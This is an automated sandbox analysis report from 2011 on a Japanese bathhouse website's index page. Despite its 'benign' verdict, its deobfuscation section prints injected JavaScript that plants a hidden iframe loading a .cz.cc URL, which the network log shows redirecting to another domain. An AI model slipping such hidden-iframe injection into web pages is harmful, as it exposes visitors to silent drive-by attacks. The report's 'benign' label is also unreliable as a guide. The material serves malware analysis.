Analysis report for http://www.ganbanyoku-tsubaki.jp/index.html
Sample Overview
URL | http://www.ganbanyoku-tsubaki.jp/index.html |
---|
MD5 | 5f373b85a47fb95b5c0d1c2c4e778273 |
Analysis Started | 2011-08-01 08:07:23 |
Report Generated | 2011-08-01 08:07:59 |
Jsand version | 1.3.2 |
See the report for domain www.ganbanyoku-tsubaki.jp.
Detection results
Detector | Result |
Jsand 1.3.2 |
benign
|
Exploits
No exploits were identified.
Deobfuscation results
Evals
if (document.getElementsByTagName('body')[0]){
iframer();
}
else {
document.write("
<iframe src='http://pzjqdclj.cz.cc/count20.php' width='10' height='10' style='visibility:h
idden;position:absolute;left:0;top:0;'></iframe>");
}
function iframer(){
var f = document.createElement('iframe');
f.setAttribute('src', 'http://pzjqdclj.cz.cc/count20.php');
f.style.visibility = 'hidden';
f.style.position = 'absolute';
f.style.left = '0';
f.style.top = '0';
f.setAttribute('width', '10');
f.setAttribute('height', '10');
document.getElementsByTagName('body')[0].appendChild(f);
}
(repeated 1 time)
var goog$calendar$GdataRequest$callback
(repeated 2 times)
-
(repeated 2 times)
Writes
<script language="VBScript">
(repeated 1 time)
-
(repeated 1 time)
-
(repeated 1 time)
-
(repeated 1 time)
ax = (IsObject(CreateObject("ShockwaveFlash.ShockwaveFlash.6")))
(repeated 1 time)
-
(repeated 1 time)
<img src='http://www.ganbanyoku-tsubaki.jp/cgi-bin/ganbanyoku/log_note.cgi?page_name=00&
(repeated 1 time)
-
(repeated 1 time)
& amp ;& amp;
http :// www.ganbanyoku - tsubaki.jp / index.html
(repeated 1 time)
-
(repeated 1 time)
<font size="-1" color="red">Flashプラグインがないので、<br>再生出来ません。<br><a href=
"http://www.adobe.com/jp/downloads/" target="Flash">ダウンロード</a></font>
(repeated 1 time)
Network Activity
Requests
URL | Status | Content Type |
http://www.ganbanyoku-tsubaki.jp/index.html
| 200 | text/html |
http://www.ganbanyoku-tsubaki.jp/common.js
| 200 | text/x-js |
about:blank
| 200 | text/html |
http://pzjqdclj.cz.cc/count20.php
| 302 | text/html |
http://simoncudby.cu.cc/showthread.php?t=90140028
| 404 | application/x-empty |
https://www.google.com/calendar/embed?showNav=0&showTabs=0&showCalendars=0&showTz=0&height=500&wkst=1&bgcolor=#ffccff&src=dcen3jh7fb2t1fs8fv3f0edsk8@group.calendar.google.com&color=#0D7813&src=p#weather@group.v.calendar.google.com&color=#2952A3&src=ja.japanese#holiday@group.v.calendar.google.com&color=#A32929&ctz=Asia/Tokyo
| 200 | text/javascript |
https://www.google.com/calendar/435ba7a4e2f1a410e67bcff4ba4f2bd7embedcompiled__en.js
| 200 | text/javascript |
https://www.google.com/calendar/435ba7a4e2f1a410e67bcff4ba4f2bd7embedcompiled_fastui.css
| 200 | text/javascript |
http://www.ganbanyoku-tsubaki.jp/undefined
| 404 | text/xml |
Redirects
From | To |
http://pzjqdclj.cz.cc/count20.php | http://simoncudby.cu.cc/showthread.php?t=90140028 |
ActiveX controls
-
Microsoft.XMLHTTP |
No attribute setting or method call detected |
Shellcode and Malware
No shellcode was identified.
No additional malware was retrieved.